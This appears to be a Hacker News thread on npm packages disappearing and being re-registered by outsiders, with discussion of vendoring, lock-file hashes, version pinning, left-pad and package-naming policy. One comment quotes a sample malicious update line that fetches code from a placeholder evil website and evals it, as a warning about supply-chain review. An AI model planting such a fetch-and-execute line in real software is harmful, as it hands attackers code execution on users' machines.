I think there's a difference between committing to source control and having local copies. For example, we use Red Hat Satellite at work: you give it a list of upstream repos and filters, and it downloads copies locally (to what it calls a 'capsule'). Then, to get those packages to your machines, you have to publish through the lifecycle process (Test > Staging > Live A > Live B - or whatever you choose).
There are multiple ways to mitigate the risk, but committing libraries into source control can cause way more headaches than it prevents, IMO.
Don't store libraries in your project's repository. It bloats things like hell and makes it difficult to navigate the change sets. Set up your own library cache. Store that cache in its own repo if that floats your boat. Then all of your projects can get their dependencies from your cache.
Well, that works if you're in another language that has an actual standard library (so you don't need 500 packages to make up for it) and only a few dependencies, which are well packaged and don't need frequent updates.
This is a rehash of my comment elsewhere here, responding to a similar point:
There are advantages to checking in all your deps, but many drawbacks as well (especially for an interpreted language; something like Go avoids a few of these):
- Incredibly slow SCM operations unless you use the perfect options every time (good luck, new devs). I've experienced this with Perforce and Git, and hoo boy does a "get three cups of coffee while you wait"-time diff/commit operation throw a hitch in your plans.
- You need either very good discipline about updating just a few packages at a time (good luck when cascading dependencies that are shared at multiple levels of the tree update), or incredibly huge, confusing diffs to read when you update stuff.
- Actually understanding the diffs you read when packages get updated. Packages updated to do things like 'http.get("$evil_website", (r) => eval(r))' are only a tiny fraction of the malicious or dangerous code you'll see in package updates.
- Hassles with regards to compiled dependencies. You have to filter them out of source control (can be a hassle to find all the places they live), or remember to rebuild when changing OS versions/stdlib versions/runtime versions/architectures/etc. That can get pretty annoying, especially since in my experience each "runtime loaded" compiled dependency gives you many completely different, utterly unintelligible errors when it's used in an environment where it should be rebuilt.
Well, Q allows you to choose between “each individual publishes their own stream” and some degree of “centralized publishing” by management teams of groups. So who should publish a stream, the individual or the group?
If the individual - the risk is that the individual may have too much power over others who come to rely on the stream. They may suddenly stop publishing it, or cut off access to everyone, which would hurt many people. (I define hurt in terms of needs or strong expectations of people that form over time.)
If the group - then managers may come and go, but the risk is that if the group is too big, it may be out of touch with the individuals. The bigger risk is that the individuals are forced to go along with the group, which may also create a lot of frustration. For instance, the group may split into three sub-groups. They are deciding where to go, but some people want to go bowling, others want to go to the movies, others want to volunteer in a soup kitchen - even though everyone belongs to the group. Who should publish these activities?
So I think when it comes to publishing streams that others can join, there should be some combination of groups and individuals. And it should reflect the best practices of what happens in the real world: one person starts a group that may later become bigger than him. Then this group grows, gets managers etc. After a while this person may leave. In the future, other individuals may want to start their own groups and invite some members of the old group to join. They may establish relationships between each other, subscribe to each other’s streams, pay each other money, etc.
If this was only a matter of missing packages, this would "only" be a matter of breaking builds.
But it looks like third parties were able to take over the missing packages, see https://github.com/npm/registry/issues/256 - which is a HUGE deal, considering "npm install" blindly executes the scripts in a package's preinstall property (as well as the packaged module itself possibly containing arbitrary backdoors)
This is why you should depend on exact versions whenever possible. But even if you do, your dependencies most likely won't, so you're screwed anyway.
The caret syntax, which silently accepts newer minor and patch versions, is an open door to a world of bullshit.
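For anyone unfamiliar with the syntax, the difference is a single character in package.json (names and versions below are made up):

    "dependencies": {
      "some-lib": "^1.2.3",
      "other-lib": "1.2.3"
    }

`^1.2.3` matches anything from 1.2.3 up to, but not including, 2.0.0; the bare `1.2.3` pins that exact release.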
I don't remember the intricacies of NPM or Yarn, but don't one/both of them have resource integrity enabled, so that you know that the package that's being installed is the one in your lock file? If not, why isn't this a feature especially after the clusterfuck of the guy deleting all his packages back about two years ago, breaking tons of things including Babel and React?
This wouldn't fix the issue of someone deleting the actual package (this happened here?), but it would prevent some malicious code being installed if someone uses the same package name.
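From what I remember, npm 5's package-lock.json does record a subresource-integrity style hash per package (and yarn pins a checksum in yarn.lock as well), roughly like this - the hash below is just a placeholder:

    "some-package": {
      "version": "1.0.0",
      "integrity": "sha512-<base64 digest of the tarball goes here>"
    }

So a same-name-different-code republish should at least fail the hash check for anyone installing from a lock file; as noted, it does nothing for packages that simply vanish.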
left-pad was a package to, you guessed it, pad a string with n leading characters. Personally, I've always just written my own two-line function for it (something like `function pad(s, n, ch) { return new Array(Math.max(0, n - s.length)).fill(ch).join("") + s; }`), but a bunch of packages either directly or indirectly depended on this left-pad package, so they all broke.
Well... no, the left-pad function is 11 lines. The source code, as it was back then, according to that Register article, was like this:
    function leftpad (str, len, ch) {
      str = String(str);
      var i = -1;
      if (!ch && ch !== 0) ch = ' ';
      len = len - str.length;
      while (++i < len) {
        str = ch + str;
      }
      return str;
    }
But yes, packages broke because of what _could_ have been implemented in one line (ignoring the two lines for the function signature and closing curly).
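(For completeness, a rough version of that one-liner; these days `String.prototype.padStart` does the same job natively:)

    const leftpad = (str, len, ch = ' ') => String(str).padStart(len, ch);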
I just don't understand how this can happen. In Maven Central for example (Java) if you publish a package it is immutable and stays there until nuclear fire immolates the Earth.
Unless I'm misunderstanding something about Central's architecture, it's not fundamentally different from NPM in this regard, though signing appears a bit more feasible.
Which means that it's not a technical difference. Maybe Central has been compromised/had issues before, just long ago (it's certainly much older). Maybe there are things wrong with NPM-as-a-company even if NPM-as-a-technology is fine. Maybe it's just luck.
But "stays there until nuclear fire immolates the Earth" sounds a bit much like "this ship is completely unsinkable" for my liking.
You know, back in the "old days", we used to host packages on these sites called "mirrors", so when one went down, we could get the package from another, and verify authenticity using multiple sources and signed files. There would be hundreds of mirrors for one set of files.
Kind of funny how shitty modern technology is. But I heard a quote recently that kind of explains it: "The more sophisticated something is, the easier it is to break it."
This may be a stupid question - I'm not that familiar with NPM or modern javascript development so forgive me, but does it not allow storing your dependencies locally? Is that not considered best practice? Just download your entire dependency tree and don't touch it unless you have to.
It seems to me that if packages "disappear" from upstream, it shouldn't have any effect other than preventing an update due to the missing dependency.
It does store them locally. I think the problems here are:
- The missing packages can be replaced by someone who wasn't the original package author (e.g. a malicious hacker)
- It's not easy to catch this ^^^ because NPM doesn't have support for signing versions in your project's dependency configuration... (I bet it will after this.)
- Almost every modern website has a dependency on NPM somewhere in their build chain
- NPM being down means loads of sites can't deploy properly
It might be easier to catch if packages were namespaced by author and package name, or even directly by URL, the way Composer does with PHP dependencies. It's easier to spoof 'infinity-agent' than 'floatdrop/infinity-agent' or 'github:floatdrop/infinity-agent'
The Maven Central repository for JVM dependencies doesn't share the problem of packages being removed like NPM periodically has, but Adam Bien has been instructing users to download the source-code for their dependencies and then compile them to their own repositories for quite a few years.
I wish I'd taken his advice as there are a couple of JAR files that I can no longer update.
I don't understand much about the blockchain, but one thing I have heard is that it's impossible (or very hard) to remove things from it. It is immutable, sort of append only, if I understand it correctly. So my question is, is there anyone working on moving npm to the blockchain? Or doing something like a package manager on the blockchain? If not, why not?
No. That's not what I'm talking about. That's just a way to host your own snapshot of the entire npm registry. Not a good way to introduce the decentralization feature of IPFS.
You don't need a full blockchain for this: the relevant property is (somewhat tautologically) that it's an append-only data structure. By convention, everyone processing the blockchain looks to make sure that the new blockchain they get is a descendant of the previous blockchain they already have.
There are lots of other structures that work like this. Git is one - when git fetches a branch, git will check whether the remote branch includes all the commits it saw last time it fetched, or some are missing. (By default this is non-fatal but tends to produce warnings/errors when you try to actually use the replaced branch, but you can easily make this fatal.) Another good one is the style of Merkle trees used in Certificate Transparency: there's no proof-of-work, so the trees are small, but they still include a cryptographic hash of each previous tree so you can detect if something has gone missing.
The other relevant property of the blockchain is that it's not a reference to data stored elsewhere; it (like git) actually contains all the data that's ever been on the blockchain, and you need that data to verify the blockchain properly. This may or may not be what you want for a programming language package manager; it means that in order to set up a new development environment, you have to download every version of every npm package that ever existed. It does accomplish the goal of preventing things from being removed, but it's pretty heavyweight.
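To make the append-only idea concrete, here's a minimal sketch (in Node, with placeholder package names; this is not how npm, git or Certificate Transparency actually store anything) of a hash-chained log where a client that remembers the last head it trusted can detect a rewritten or truncated history:

    const crypto = require("crypto");
    const sha256 = (s) => crypto.createHash("sha256").update(s).digest("hex");

    // Append a release record; each entry's head commits to the previous head.
    function append(log, record) {
      const prev = log.length ? log[log.length - 1].head : "genesis";
      const head = sha256(prev + JSON.stringify(record));
      log.push({ record, head });
      return head;
    }

    // Recompute every link to detect entries altered after the fact.
    function verify(log) {
      let prev = "genesis";
      for (const entry of log) {
        if (entry.head !== sha256(prev + JSON.stringify(entry.record))) return false;
        prev = entry.head;
      }
      return true;
    }

    // A client only remembers the last head it trusted; on the next sync it
    // checks that this head is still part of the (valid) history it receives.
    function extendsTrustedHistory(log, trustedHead) {
      return verify(log) && (trustedHead === "genesis" || log.some((e) => e.head === trustedHead));
    }

    const log = [];
    append(log, { pkg: "some-package", version: "1.0.0" });
    const myHead = append(log, { pkg: "another-package", version: "2.3.4" });
    append(log, { pkg: "some-package", version: "1.0.1" });
    console.log(extendsTrustedHistory(log, myHead)); // true; false if history was rewritten

The point is just that detecting removal doesn't require proof of work, only that clients remember the last head they saw.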
> By convention, everyone processing the blockchain looks to make sure that the new blockchain they get is a descendant of the previous blockchain they already have.
This is not true. Bitcoin-esque blockchains are NOT append-only. The only things clients do are: 1) ensure the blockchain they have received is valid, and 2) check that it is longer (has more total PoW). If those conditions are met, they will consider that new chain the current chain.
You can come up with a new, completely different sequence of blocks, send it to clients on the network, and get them to start using that new chain instead as long as it has more PoW.
Oh, right. That seems like not a property you want in software releases - there shouldn't be a possibility of getting spoofed data (or metadata), either you get a signed release or no release at all. Bitcoin needs that because there's no signing authority.
The key thing here is that there is an obvious central authority for software releases (the NPM registry, or GitHub, or Debian, or whatever), so proof-of-work-style systems are overkill because you don't fundamentally need decentralization. You could imagine some sort of decentralized first-come-first-serve software registry, but that doesn't seem obviously better than a central one.
Well, we don't know what caused the issue yet, so we can't say for sure. But I suspect that whatever family of problem deleted the packages causing this trouble could just as easily apply to the deletion (and illegitimate reclamation) of usernames.
I don't get why we don't just use a git repo registry (e.g. GitHub) for package management. If you work in a "strict" environment you can basically fork all your dependencies and use your own git repo registry.
NPM already allows using git repos, but needs some tweaks for better support, for the purpose of a reproducible `node_modules` tree.
Ideally, if all packages used commits and the installation algorithm never changed, there would be no need for lock files.
In reality, some packages will keep using NPM's existing mechanism, so a git-based algorithm would need to accommodate that by reading the git repo behind the NPM package and referring to a specific commit, which should be stored in `package-lock.json`.
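For what it's worth, npm can already pin a dependency to an exact commit of a git repo; in package.json it looks roughly like this (repo name reused from elsewhere in the thread, the SHA is a placeholder):

    "dependencies": {
      "infinity-agent": "github:floatdrop/infinity-agent#<commit-sha>"
    }

The catch is exactly the one above: it only gives you a reproducible tree if every transitive dependency does the same.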
Could someone explain why dependency-management-systems don't enforce immutable releases? Ie, package owners can publish all the new versions they want, but they are never able to edit/remove/liberate an already-released version. It seems like that would solve so many problems, such as the left-pad fiasco.
As someone unfamiliar with NPM, why does it not lock package names for a certain period of time? Rubygems has a 90 day period, so if a package is completely removed, the name can't be used for that long. That seems like it would help with the security side of these problems.
> As someone unfamiliar with NPM, why does it not lock package names for a certain period of time?
From [1]:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
I am kinda assuming that if npm support were to help you unpublish a package that is depended upon (they might refuse), they would prevent someone else from re-publishing to that name (they might put up their own placeholder package, like they did during the left-pad incident), but granted I can't find this stated anywhere.
I think the reason re-publishing seemed to happen in this case was they weren't prepared for whatever vector allowed for the deletion of these packages.
I made a half-joking comment on that thread that "'Bout time NPM goes blockchain." Either someone deleted it, or GitHub lost it among all the traffic to that issue.
Wonder if npm, Inc. would view a decentralized registry as a threat to their business model?
Is there a possibility that npm turns package names into an "author/package" style, so there would be less confusion about what users are installing and less chance of name squatting?
Remember to freeze your packages after installing them as a project dependency. You should have the packages in your source tree or your own internal package manager (a local NuGet feed, for example).
Is there any chance of something similar happening for NuGet? I rely on it heavily for project dependencies, and I'd like to know if there's a ticking time bomb there too.
So, funny story: I registered the "nazi" npm package. When you require it, it says "I did nazi that coming." That's it. (Though it would've been a funny name for a linter.)
... Or it did. I received a harshly worded letter from npm saying they axed it. It hit all the talking points about inclusiveness and making sure no one feels even slightly annoyed.
Meh. No point to this story. Just an interesting situation with an inconsistently curated package manager. I was surprised there was an unofficial undocumented banlist.
I guess lots of people will think that a policy like "Avoid using offensive or harassing package names, nicknames, or other identifiers that might detract from a friendly, safe, and welcoming environment for all" stifles their inner something-or-other, though.
Seems like a good reflection of the current social climate: they have a policy to prevent mildly offensive package names, and they enforce it, but they don't have a solution to packages randomly disappearing and being replaced with malicious versions.
Or it could be that it's easy to do simple low-hanging-fruit things and harder to do more complicated things. The whole JS ecosystem has come together in a rather ad-hoc way, it's plain stupidity or moronic political gamesmanship to assume more motivation than "nobody thought it worth blocking the entire platform to build a fully-trusted base infrastructure so far."
It's funny how many people get easily pissed off about other people allegedly being oversensitive. And it's sad how many of them are part of my same bullied-as-young-nerds cohort, considering that it appears their reaction to getting some power for the first time in their lives was to jump into the bully camp themselves.
That seems like an implausible explanation for a comment trying to make a political issue out of two disjoint things: a package manager design flaw and an editorial control policy for package names. "Publishers" having a level of interest in what goes out on their platform is as old as anything, and so is flawed software design.
So I stick by my stance that trying to tie those things together ("you screwed this up because you're morally in the wrong, as shown by your focusing on the wrong things") to advance a personal political agenda is the more bullying behavior here.
> using political correctness to bully people around them.
"Please don't use unnecessarily harmful/crude/we-don't-like-it language when giving names to pieces of computer software that we host, manage, and coordinate for you" counts as bullying now? I think not. As they say, if you don't like it, don't play.
And besides, NPM seems pretty focused on package names alone (as they should be). If you absolutely must live out your libertarian fantasy by being insulting, nobody's stopping you from making the API to your package something like:
But people do have knee-jerk reactions, and people do overreact for fear of it being bullying next time. Neither of those is likely to be warranted in this case, but people's feelings aren't very contextual. Many people will react to overreaching political correctness out of fear alone, and it isn't nice for the GP to accuse them of bullying.
Yes, it's sad what people do out of fear. But excusing and ignoring unpleasant behavior as a "knee-jerk reaction" or "overreaction," and complaining about someone criticizing it, has many, many dangers of its own.
I miss the days when everyone predicted and solved technical bugs with ease and didn't have time for eye-rollingly simple things like saying "don't be an idiot". Remind me when that social climate was in place, again?
Try a package named Nazí, which provides a collection of the chess games of 2016 US Women's Chess Champion Nazí Paikidze [1]. At the same time also do one named Fabiano, which provides a collection of the games of Fabiano Caruana [2], the 2016 US Chess Champion.
If they take down the Nazí one but not the Fabiano one, you can then take your mischief-making to the next level by accusing them of being misogynists for banning a package promoting a woman chess champion while leaving up the one for the man.
> But HN user "baby" recently made a blockchain-based image board that was theoretically impossible to control. How would people behave in such a situation? Who would you even punish?
Probably will get scooped up by pedophiles sooner or later, followed by a couple of high-profile arrests, and everyone will be scared shitless to run a node for that blockchain. CP has always been a good scare for Tor exit node operators; thankfully Tor nodes don't store the stuff, in contrast to a blockchain, so at least the operators didn't have to serve jail time, but a couple have had their houses raided by the cops and all their IT equipment confiscated for months.
Actually, from a libertarian POV I really like the idea, both behind an uncensorable imageboard and Tor, but the simple fact that pedophiles and Nazis can and will abuse the openness for their vile gains makes me believe that the world will probably never be ready for such a thing as widespread service. For now we as society have to be lucky that many pedophiles, drug dealers and Nazis don't really care about good opsec... but that one is bound to change.
> Actually, from a libertarian POV I really like the idea, both behind an uncensorable imageboard and Tor, but the simple fact that pedophiles and Nazis can and will abuse the openness for their vile gains makes me believe that the world will probably never be ready for such a thing as widespread service.
Similar considerations are why I never ran a Tor exit node, despite my inner geek wanting to as soon as I heard about it because the technology is cool.
The deciding factor was that almost every good thing that I could think of or that people suggested that a truly anonymous, untraceable, non-moderated, anybody to anybody communication system could be used for were things that could be reasonably accomplished by other means that are not as open to abuse.
For example, a common scenario offered is someone inside an oppressive regime working to document the regime's abuses and bring it down. They would be tortured and killed (and possibly so would their family) if their identity became known.
But they just need a secure channel to a trusted contact outside the reach of the regime who can relay messages for them. It does not have to be an anybody-to-anybody channel or a non-moderated channel.
The only things I could think of that really need something like Tor are things where what you are doing is so near universally frowned upon that there is almost nobody willing to be publicly associated with facilitating it.
> What if "emacs" was a smear in Portuguese, or "vim" was an unspeakable slur in India?
You can even get this kind of problem without involving a different language, because words can have different meaning in different fields.
There is a (probably) urban legend about a mathematics grad student working in algebraic geometry returning from a conference, who finds he is sharing the security line at the airport with another conference attendee and they start chatting about algebraic geometry, talking about "blowing up points on a plane". It does not go over well with the non-mathematicians in line or with the TSA agents.
Efim Zelmanov, a noted algebraist, tells of being stopped by the KGB on the way to a conference and being questioned at length because he had books with him about "free groups" and "radicals".
> I've often wondered whether foreign users ever get annoyed with some of our names that happen to acronym to something unfortunate in their native language. Do they just have to live with it, or does it never happen?
All the time, and the response from devs... depends. Remember the recent Pik image format? Or Pidora Linux, which to a Russian ear sounds akin to "FedoPiLix"? Or Vista, which is exactly "chicken" in Latvian?
Mostly you kind of keep laughing and wincing for a few years, then you sorta get used to it.
> Yet this is all very English-centric. I've often wondered whether foreign users ever get annoyed with some of our names that happen to acronym to something unfortunate in their native language. Do they just have to live with it, or does it never happen?
Well, we have to live with it, and funny things happen. In Turkish, which is my mother tongue, the English word Scheme sounds very similar to "sikim", which is a very vulgar way to say "my dick". About five years ago, I was having lunch with colleagues (programmers), chatting about programming languages, and when I said I liked Scheme, I got some weird looks :) Some more on this: https://news.ycombinator.com/item?id=7421315
> New Geometry Representation might be a fine name for a new format, but you're not going to use its acronym.
I might... the acronym doesn't ring any bells and a Google search doesn't show anything special (if anything, it already shows a bunch of other things - including companies and organizations - using the same letters). What is the issue?
I think they are imagining people trying to pronounce the acronyms ngr and fgt and getting offensive words out of them. I don’t think that would have occurred to me.
Seriously, you shouldn't depend on third-party things existing happily to cut releases of your software. Mirror, vendor, proxy, whatever - but you should absolutely strive to be the biggest weakness in your dependency chain yourself.
That's probably fine from the security perspective, but the hash won't make the package reappear if it disappears out of nowhere. That's the other benefit of a private/on-premises mirror.
True. I work with PyPI and it's been extremely solid for years, so we tend to just not consider this a problem at all. Pipenv stores hashes for each package version as well, so you get the security aspect built in.
Pipenv has pretty much fixed Python packaging/dependencies, in my opinion. It's the all-in-one tool I've always wanted. If you do any Python work, try it, it's great.